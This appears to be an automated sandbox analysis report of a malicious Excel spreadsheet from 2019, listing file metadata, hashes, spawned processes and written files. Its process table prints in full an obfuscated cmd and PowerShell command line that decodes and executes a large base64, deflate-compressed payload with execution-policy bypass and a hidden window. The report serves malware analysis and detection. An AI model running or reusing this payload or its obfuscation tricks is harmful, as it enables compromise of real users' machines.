File name: | 2c4d7acd95dd399814f9cdf944ed69dce1abfb459be60d454887221771977e49.xls |
Full analysis: | https://app.any.run/tasks/cc630c73-7522-43e3-b5fa-d3ef8c00cf3e |
Verdict: | Malicious activity |
Analysis date: | March 22, 2019, 01:57:58 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: uTenTe, Last Saved By: IEUser, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Mar 21 08:09:13 2019, Last Saved Time/Date: Thu Mar 21 08:24:39 2019, Security: 0 |
MD5: | F3E18B10BDF59FC569FA062DFE27D86E |
SHA1: | 994B7426D30B8FE5B9BD08CD7481749FCAA524C0 |
SHA256: | 2C4D7ACD95DD399814F9CDF944ED69DCE1ABFB459BE60D454887221771977E49 |
SSDEEP: | 3072:vn1DN3aM+UKccCEW8yjJTdrBZq8/ak3hOdsylKlgryzc4bNhZFGzE+cL2knAimoh:vn1DN3aM+UKccCEW8yjJTdrBZq8/ak3R |
.xls | | | Microsoft Excel sheet (48) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (39.2) |
CompObjUserType: | Microsoft Excel 2003 Worksheet |
---|---|
CompObjUserTypeLen: | 31 |
HeadingPairs: |
|
TitleOfParts: | f 2 0 1 9. 0 3 |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
Company: | Microsoft |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
ModifyDate: | 2019:03:21 08:24:39 |
CreateDate: | 2019:03:21 08:09:13 |
Software: | Microsoft Excel |
LastModifiedBy: | IEUser |
Author: | uTenTe |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1332 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
1296 | cMd /c "set Bfa=(new-oBjecT SYsTeM.Io.cOmPreSSiOn.DeflateStreaM( [sySTem.IO.meMORYstReaM][cONvert]::frOmbaSe64STRiNG( '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' ) , [SYSTem.iO.coMpREssIoN.cOmPRESSIOnMOdE]::dEcoMPREss )^|fOReAch-OBJEcT{ nEW-oBjECT io.STrEAmREader($_ , [SyStEm.TEXT.EncOdiNg]::ASciI )}).rEaDtoEND( )^|. ( $Env:cOmspec[4,24,25]-jOIn'')&&seT kmFr=PowErSHeLL -NOni -EXeC BypAsS -w 1 -NoPR ( .( \"{0}{2}{1}\"-f'GE','-iteM','t' ) ( \"{0}{1}\" -f 'E','Nv:Bfa') ).\"V`ALue\" ^^^|. ( ${P`sho`ME}[4] + ${pS`HOmE}[30]+ 'X' )&& CMd.eXE /c %KmFr%" | C:\Windows\system32\cMd.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3024 | CMd.eXE /c %KmFr% | C:\Windows\system32\cmd.exe | — | cMd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3900 | PowErSHeLL -NOni -EXeC BypAsS -w 1 -NoPR ( .( \"{0}{2}{1}\"-f'GE','-iteM','t' ) ( \"{0}{1}\" -f 'E','Nv:Bfa') ).\"V`ALue\" |. ( ${P`sho`ME}[4] + ${pS`HOmE}[30]+ 'X' ) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1332 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR92E0.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3900 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1MGTFVD0ADAHRRBYO6GN.temp | — | |
MD5:— | SHA256:— | |||
3900 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf9f06.TMP | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C | |||
3900 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C |